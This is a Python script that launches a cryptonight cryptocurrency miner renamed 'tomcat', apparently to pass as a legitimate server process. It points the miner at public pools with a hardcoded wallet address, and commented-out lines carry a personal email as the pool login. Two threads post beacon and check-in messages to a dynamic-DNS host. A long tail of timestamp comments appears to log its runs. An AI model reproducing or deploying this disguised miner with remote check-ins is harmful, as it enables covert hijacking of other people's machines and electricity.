import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:01.513775
#2018-02-17 16:23:05.270041
#2018-02-17 18:10:01.800182
#2018-02-17 19:57:05.181680
#2018-02-17 21:45:05.716034
#2018-02-17 23:29:04.980603
#2018-02-18 01:19:04.606811
#2018-02-18 03:06:01.547645
#2018-02-18 04:53:06.607712
#2018-02-18 06:43:06.146711
#2018-02-18 08:33:05.213204
#2018-02-18 10:20:07.540164
#2018-02-18 12:06:07.975278
#2018-02-18 13:51:05.554323
#2018-02-18 15:43:05.595442
#2018-02-18 17:33:04.669993
#2018-02-18 19:19:05.764917
#2018-02-18 21:05:07.383173
#2018-02-18 22:52:05.558601
#2018-02-19 00:40:05.899760
#2018-02-19 02:26:05.660855
#2018-02-19 04:13:03.902054
#2018-02-19 05:56:06.089901
#2018-02-19 07:45:07.830551
#2018-02-19 09:34:07.099731
#2018-02-19 11:24:06.631743
#2018-02-19 13:11:01.572910
#2018-02-19 14:58:06.452655
#2018-02-19 16:46:10.505006
#2018-02-19 18:33:04.277139
#2018-02-19 20:19:02.220493
#2018-02-19 22:08:05.510600
#2018-02-19 23:54:06.711757
#2018-02-20 01:40:04.473880
#2018-02-20 03:28:02.117560
#2018-02-20 05:15:09.614823
#2018-02-20 06:59:04.312910
#2018-02-20 08:46:04.446102
#2018-02-20 10:30:11.519341
#2018-02-20 12:15:10.583085
#2018-02-20 14:03:04.970254
#2018-02-20 15:47:01.776724
#2018-02-20 17:34:08.034837
#2018-02-20 19:21:04.411092
#2018-02-20 21:10:08.296977
#2018-02-20 22:56:01.709756
#2018-02-21 00:38:07.979833
#2018-02-21 02:25:03.832761
#2018-02-21 04:11:03.230088
#2018-02-21 05:57:06.810308
#2018-02-21 07:46:01.508581
#2018-02-21 09:32:04.424752
#2018-02-21 11:20:07.729692
#2018-02-21 13:09:01.812727
#2018-02-21 14:55:09.890362
#2018-02-21 16:45:02.207109
#2018-02-21 18:37:08.980592
#2018-02-21 20:22:07.885361
#2018-02-21 22:10:10.459131
#2018-02-21 23:58:06.331473
#2018-02-22 01:44:07.079493
#2018-02-22 03:31:06.300357
#2018-02-22 05:18:06.569420
#2018-02-22 07:04:06.618637
#2018-02-22 08:52:07.052046
#2018-02-22 10:41:07.376408
#2018-02-22 12:27:06.178300
#2018-02-22 14:13:01.621998
#2018-02-22 16:01:08.870289
#2018-02-22 17:47:07.144482
#2018-02-22 19:35:04.828603
#2018-02-22 21:27:04.106720
#2018-02-22 23:12:02.048195
#2018-02-23 00:59:02.225620
#2018-02-23 02:47:05.872497
#2018-02-23 04:36:05.603347
#2018-02-23 06:22:05.907311
#2018-02-23 08:10:04.111271
#2018-02-23 10:26:07.250231
#2018-02-23 12:19:06.525986
#2018-02-23 14:07:01.512612
#2018-02-23 15:56:07.025961
#2018-02-23 17:42:06.498871
#2018-02-23 19:28:01.354739
#2018-02-23 21:11:04.012632
#2018-02-23 22:58:04.445109
#2018-02-24 00:45:11.021217
#2018-02-24 02:35:07.848862
#2018-02-24 04:29:02.052980
#2018-02-24 06:15:09.542135
#2018-02-24 08:03:03.468543
#2018-02-24 09:46:01.405197
#2018-02-24 11:41:05.017288
#2018-02-24 13:33:04.347285
#2018-02-24 15:20:07.092215
#2018-02-24 17:10:03.737479
#2018-02-24 19:01:04.600228
#2018-02-24 20:48:04.313120
#2018-02-25 01:20:03.949819
#2018-02-25 05:22:06.262365
#2018-02-25 11:34:05.548369